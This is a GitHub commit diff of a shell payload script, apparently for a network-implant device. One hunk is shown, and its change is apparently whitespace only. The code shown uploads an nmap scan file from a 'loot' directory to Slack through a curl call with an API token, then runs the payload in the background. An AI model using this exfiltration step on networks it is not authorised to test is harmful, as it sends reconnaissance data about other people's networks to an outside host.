Update payload.sh

pull/18/head
deviant 2020-05-20 19:33:41 -07:00 committed by GitHub
parent d8be685b59
commit 1698a082c3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -94,11 +94,11 @@ function slack() {
# Curl magic
curl \
-F file=@$LOOT_DIR/nmap-scan_$SCAN_M.txt \
-F initial_comment="A network has been discovered!" \
-F initial_comment="A network has been discovered!" \
-F channels=#shark \
-F token=${SLACKTOKEN} \
https://slack.com/api/files.upload
}
# Run payload
run &
run &